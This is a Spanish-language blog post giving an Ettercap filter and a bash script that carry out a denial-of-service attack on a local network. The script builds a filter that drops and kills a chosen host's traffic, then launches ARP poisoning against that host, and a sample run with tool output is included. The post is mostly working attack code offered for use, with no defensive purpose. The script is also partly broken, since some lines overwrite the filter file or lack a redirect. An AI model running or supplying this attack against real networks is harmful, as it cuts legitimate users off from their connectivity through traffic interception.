Denegación de servicio (DOS) con Ettercap

Buenas tardes,

Hoy voy a publicar un pequeño filtro para Ettercap para realizar una denegación de servicio.

Que es un ataque DOS:

En seguridad informática, un ataque de denegación de servicio, también llamado ataque DoS(de las siglas en inglés Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima.

Se genera mediante la saturación de los puertos con flujo de información, haciendo que el servidorse sobrecargue y no pueda seguir prestando servicios, por eso se le denomina “denegación”, pues hace que el servidor no dé abasto a la cantidad de solicitudes. Esta técnica es usada por los llamados Crackers para dejar fuera de servicio a servidores objetivo.

 

Filtro Ettercap

if (ip.src == 'DIRECCION IP ' ||  ip.dst == 'DIRECCION IP')
{
drop();
kill();
}

Para no tener que editar el fichero del filtro e creado un pequeño Script muy guarro la verdad… pero bueno. funciona jajaja.

#!/bin/bash
#Script ddos Ettercap
#Miramos si el usuario que este ejecutando es root. si no lo es, hacemos un exit
if [ $(whoami) != "root" ]; then
        echo "Debes ser root para correr este script."
        echo "Para entrar como root, escribe \"su\" sin  las comillas."
        exit 1
#Miramos si tiene instalado el Ettercap, si no lo tiene hacemos un exit
elif [ ! -x  "/usr/sbin/ettercap" ]; then
        echo "Parece que no tienes instalado Ettercap"
        echo "Para instalarlo en distribuciones basadas en Debian: apt-get install ettercap"
        echo "Para instalarlo en distribuciones basadas en Redhat: yum install ettercap"
        exit 1
fi
#Ponemos un a cabecera bonita
echo
echo "    Script ddos Ettercap"
echo "_____ ____ __________________"
echo
#Preguntamos la dirección Origen, Destino y la interfaz
read -p "Introduzca direccion origen: " ipsrc
read -p "Introduzca direccion destino: " ipdst
read -p "Introduzca la Interfaz. Ejemplo eth0: " inter
#Miramos si el archivo dos.eft existe, en caso que  exista lo borramos
#Y lo creamos de nuevo con la configuracion añadida anteriormente
#Es una gilipollez pero nose porque lo echo asi
if [ -e dos.eft ]
then
        rm -r dos.eft
        echo "if (ip.src == '$ipsrc' ||  ip.dst == '$ipdst') " >> dos.eft
        echo "{" >> dos.eft
        echo "drop();" >> dos.eft
        echo "kill();" >> dos.eft
         echo "msg('Toma kill 9!!!!');" dos.eft
        echo "}" >> dos.eft
#Una vez generado el archivo hacemos un etterfilter para generar dos.ef
       etterfilter dos.eft -o dos.ef
#En el caso que el archivo dos.eft no existiese hacemos lo mismo
#Genera el archivo y le pasa los datos agregados anteriormente
else
        echo "if (ip.src == $ipsrc || ip.dst == $ipdst) {" > dos.eft
        echo "drop();" > dos.eft
        echo "kill();" > dos.eft
        echo "msg('Toma kill 9!!!!');" dos.eft
        echo "}" >  dos.eft
        etterfilter dos.eft -o dos.ef
fi
#Comprueba que dos.ef exista, si existe realizamos el ataque.
if [ -e dos.ef ]
then
         ettercap -T -q -F dos.ef -M ARP /$ipdst/ // -i $inter
#En caso que no exista lo creamos con etterfilter y empezamos el ataque
else
        etterfilter dos.eft  -o dos.ef
         ettercap -T -q -F dos.ef -M ARP /$ipdst/ // -i $inter
fi

Atacante

Ejemplo: de utilización:

rokitoh@red-orbitasudo:~# sh ddos.sh

Script ddos Ettercap
_____ ____ __________________

Introduzca direccion origen: 192.168.1.100
Introduzca direccion destino: 192.168.1.105
Introduzca la Interfaz. Ejemplo eth0: eth1
msg(‘Toma kill 9!!!!’); dos.eft

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA

12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file ‘dos.eft’ done.

Unfolding the meta-tree done.

Converting labels to real offsets done.

Writing output to ‘dos.ef’ done.

-> Script encoded into 7 instructions.

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from dos.ef…
Listening on eth1… (Ethernet)

eth1 -> 00:1F:D0:21:E9:3F 192.168.1.102 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
* |==================================================>| 100.00 %

3 hosts added to the hosts list…

ARP poisoning victims:

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…

Victima:


 

 

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*